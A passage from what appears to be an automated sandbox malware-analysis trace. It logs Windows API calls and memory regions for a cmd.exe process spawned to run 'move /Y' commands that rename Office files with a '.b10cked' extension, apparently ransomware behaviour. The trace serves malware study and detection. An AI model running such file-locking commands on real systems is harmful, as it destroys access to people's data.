"c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\outlwvw.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWVW.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\outlwvw.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0157.440] FindClose (in: hFindFile=0x432130 | out: hFindFile=0x432130) returned 1 [0157.440] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2ae8b8 | out: _Buffer=" 1") returned 9 [0157.440] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.440] GetFileType (hFile=0x7) returned 0x2 [0157.440] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0157.441] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ae844 | out: lpMode=0x2ae844) returned 1 [0157.441] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.441] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ae878 | out: lpConsoleScreenBufferInfo=0x2ae878) returned 1 [0157.441] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0157.441] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2ae8b8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0157.441] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2ae89c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2ae89c*=0x1a) returned 1 [0157.442] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.442] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0157.442] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.442] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0157.442] _get_osfhandle (_FileHandle=0) returned 0x3 [0157.442] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0157.442] SetConsoleInputExeNameW () returned 0x1 [0157.442] GetConsoleOutputCP () returned 0x1b5 [0157.442] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0157.442] SetThreadUILanguage (LangId=0x0) returned 0x409 [0157.443] exit (_Code=0) Process: id = "263" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ac0" os_pid = "0xe6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 21703 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 21704 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 21705 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 21706 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 21707 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 21708 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 21709 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 21710 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 21711 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 21712 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 21713 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 21714 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 21715 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 21716 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 21717 start_va = 0x440000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 21718 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 21719 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 21720 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 21721 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 21722 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 21723 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 21724 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 21725 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 21726 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 21727 start_va = 0x370000 end_va = 0x437fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 21728 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 21729 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 21730 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 21731 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 21732 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 21733 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 21734 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 21735 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 21736 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Thread: id = 326 os_tid = 0x82c [0157.547] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20f8a4 | out: lpSystemTimeAsFileTime=0x20f8a4*(dwLowDateTime=0x97d69460, dwHighDateTime=0x1d440a9)) [0157.547] GetCurrentProcessId () returned 0xe6c [0157.547] GetCurrentThreadId () returned 0x82c [0157.547] GetTickCount () returned 0x30453 [0157.547] QueryPerformanceCounter (in: lpPerformanceCount=0x20f89c | out: lpPerformanceCount=0x20f89c*=21433653282) returned 1 [0157.548] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0157.548] __set_app_type (_Type=0x1) [0157.548] __p__fmode () returned 0x76b331f4 [0157.548] __p__commode () returned 0x76b331fc [0157.548] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0157.549] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0157.549] GetCurrentThreadId () returned 0x82c [0157.549] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x82c) returned 0x38 [0157.549] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0157.549] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0157.549] SetThreadUILanguage (LangId=0x0) returned 0x409 [0157.549] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0157.549] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20f834 | out: phkResult=0x20f834*=0x0) returned 0x2 [0157.549] VirtualQuery (in: lpAddress=0x20f86b, lpBuffer=0x20f804, dwLength=0x1c | out: lpBuffer=0x20f804*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0157.550] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20f804, dwLength=0x1c | out: lpBuffer=0x20f804*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0157.550] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20f804, dwLength=0x1c | out: lpBuffer=0x20f804*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0157.550] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20f804, dwLength=0x1c | out: lpBuffer=0x20f804*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0157.550] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20f804, dwLength=0x1c | out: lpBuffer=0x20f804*(BaseAddress=0x210000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x60000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0157.550] GetConsoleOutputCP () returned 0x1b5 [0157.550] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0157.550] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0157.550] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.550] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0157.550] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.550] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0157.551] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.551] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0157.551] _get_osfhandle (_FileHandle=0) returned 0x3 [0157.551] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0157.551] _get_osfhandle (_FileHandle=0) returned 0x3 [0157.551] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0157.551] GetEnvironmentStringsW () returned 0x280210* [0157.552] FreeEnvironmentStringsW (penv=0x280210) returned 1 [0157.552] GetEnvironmentStringsW () returned 0x280210* [0157.552] FreeEnvironmentStringsW (penv=0x280210) returned 1 [0157.552] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e7a4 | out: phkResult=0x20e7a4*=0x40) returned 0x0 [0157.552] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e7ac, lpData=0x20e7b0, lpcbData=0x20e7a8*=0x1000 | out: lpType=0x20e7ac*=0x0, lpData=0x20e7b0*=0xa0, lpcbData=0x20e7a8*=0x1000) returned 0x2 [0157.552] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e7ac, lpData=0x20e7b0, lpcbData=0x20e7a8*=0x1000 | out: lpType=0x20e7ac*=0x4, lpData=0x20e7b0*=0x1, lpcbData=0x20e7a8*=0x4) returned 0x0 [0157.552] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e7ac, lpData=0x20e7b0, lpcbData=0x20e7a8*=0x1000 | out: lpType=0x20e7ac*=0x0, lpData=0x20e7b0*=0x1, lpcbData=0x20e7a8*=0x1000) returned 0x2 [0157.552] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e7ac, lpData=0x20e7b0, lpcbData=0x20e7a8*=0x1000 | out: lpType=0x20e7ac*=0x4, lpData=0x20e7b0*=0x0, lpcbData=0x20e7a8*=0x4) returned 0x0 [0157.552] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e7ac, lpData=0x20e7b0, lpcbData=0x20e7a8*=0x1000 | out: lpType=0x20e7ac*=0x4, lpData=0x20e7b0*=0x40, lpcbData=0x20e7a8*=0x4) returned 0x0 [0157.552] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e7ac, lpData=0x20e7b0, lpcbData=0x20e7a8*=0x1000 | out: lpType=0x20e7ac*=0x4, lpData=0x20e7b0*=0x40, lpcbData=0x20e7a8*=0x4) returned 0x0 [0157.552] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e7ac, lpData=0x20e7b0, lpcbData=0x20e7a8*=0x1000 | out: lpType=0x20e7ac*=0x0, lpData=0x20e7b0*=0x40, lpcbData=0x20e7a8*=0x1000) returned 0x2 [0157.552] RegCloseKey (hKey=0x40) returned 0x0 [0157.552] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e7a4 | out: phkResult=0x20e7a4*=0x40) returned 0x0 [0157.553] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e7ac, lpData=0x20e7b0, lpcbData=0x20e7a8*=0x1000 | out: lpType=0x20e7ac*=0x0, lpData=0x20e7b0*=0x40, lpcbData=0x20e7a8*=0x1000) returned 0x2 [0157.553] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e7ac, lpData=0x20e7b0, lpcbData=0x20e7a8*=0x1000 | out: lpType=0x20e7ac*=0x4, lpData=0x20e7b0*=0x1, lpcbData=0x20e7a8*=0x4) returned 0x0 [0157.553] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e7ac, lpData=0x20e7b0, lpcbData=0x20e7a8*=0x1000 | out: lpType=0x20e7ac*=0x0, lpData=0x20e7b0*=0x1, lpcbData=0x20e7a8*=0x1000) returned 0x2 [0157.553] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e7ac, lpData=0x20e7b0, lpcbData=0x20e7a8*=0x1000 | out: lpType=0x20e7ac*=0x4, lpData=0x20e7b0*=0x0, lpcbData=0x20e7a8*=0x4) returned 0x0 [0157.553] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e7ac, lpData=0x20e7b0, lpcbData=0x20e7a8*=0x1000 | out: lpType=0x20e7ac*=0x4, lpData=0x20e7b0*=0x9, lpcbData=0x20e7a8*=0x4) returned 0x0 [0157.553] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e7ac, lpData=0x20e7b0, lpcbData=0x20e7a8*=0x1000 | out: lpType=0x20e7ac*=0x4, lpData=0x20e7b0*=0x9, lpcbData=0x20e7a8*=0x4) returned 0x0 [0157.553] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e7ac, lpData=0x20e7b0, lpcbData=0x20e7a8*=0x1000 | out: lpType=0x20e7ac*=0x0, lpData=0x20e7b0*=0x9, lpcbData=0x20e7a8*=0x1000) returned 0x2 [0157.553] RegCloseKey (hKey=0x40) returned 0x0 [0157.553] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886380 [0157.553] srand (_Seed=0x5b886380) [0157.553] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.DLL.trx_dll.b10cked\"" [0157.553] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.DLL.trx_dll.b10cked\"" [0157.554] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0157.554] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x281970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0157.554] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0157.554] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0157.554] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0157.554] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0157.554] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0157.554] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0157.554] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0157.554] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0157.555] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0157.555] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0157.555] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0157.555] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0157.555] GetEnvironmentStringsW () returned 0x282360* [0157.555] FreeEnvironmentStringsW (penv=0x282360) returned 1 [0157.555] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0157.555] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0157.555] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0157.555] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0157.555] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0157.555] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0157.555] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0157.555] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0157.555] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0157.555] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0157.556] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f570 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0157.556] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20f570, lpFilePart=0x20f56c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f56c*="Desktop") returned 0x18 [0157.556] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0157.556] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f2ec | out: lpFindFileData=0x20f2ec) returned 0x2809f0 [0157.556] FindClose (in: hFindFile=0x2809f0 | out: hFindFile=0x2809f0) returned 1 [0157.556] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f2ec | out: lpFindFileData=0x20f2ec) returned 0x2809f0 [0157.556] FindClose (in: hFindFile=0x2809f0 | out: hFindFile=0x2809f0) returned 1 [0157.557] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f2ec | out: lpFindFileData=0x20f2ec) returned 0x2809f0 [0157.557] FindClose (in: hFindFile=0x2809f0 | out: hFindFile=0x2809f0) returned 1 [0157.557] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0157.557] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0157.557] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0157.557] GetEnvironmentStringsW () returned 0x280210* [0157.557] FreeEnvironmentStringsW (penv=0x280210) returned 1 [0157.557] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0157.558] GetConsoleOutputCP () returned 0x1b5 [0157.558] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0157.558] GetUserDefaultLCID () returned 0x409 [0157.558] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0157.559] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20f6b0, cchData=128 | out: lpLCData="0") returned 2 [0157.559] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20f6b0, cchData=128 | out: lpLCData="0") returned 2 [0157.559] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20f6b0, cchData=128 | out: lpLCData="1") returned 2 [0157.559] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0157.559] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0157.559] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0157.559] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0157.559] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0157.559] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0157.559] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0157.559] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0157.559] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0157.559] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0157.559] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0157.560] GetConsoleTitleW (in: lpConsoleTitle=0x270930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0157.561] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0157.561] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0157.561] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0157.561] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0157.562] _wcsicmp (_String1="move", _String2=")") returned 68 [0157.562] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0157.562] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0157.562] _wcsicmp (_String1="IF", _String2="move") returned -4 [0157.562] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0157.562] _wcsicmp (_String1="REM", _String2="move") returned 5 [0157.562] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0157.566] GetConsoleTitleW (in: lpConsoleTitle=0x20f3a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0157.567] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0157.567] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0157.567] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0157.567] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0157.567] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0157.567] _wcsicmp (_String1="move", _String2="CD") returned 10 [0157.567] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0157.567] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0157.567] _wcsicmp (_String1="move", _String2="REN") returned -5 [0157.567] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0157.567] _wcsicmp (_String1="move", _String2="SET") returned -6 [0157.567] _wcsicmp (_String1="move", 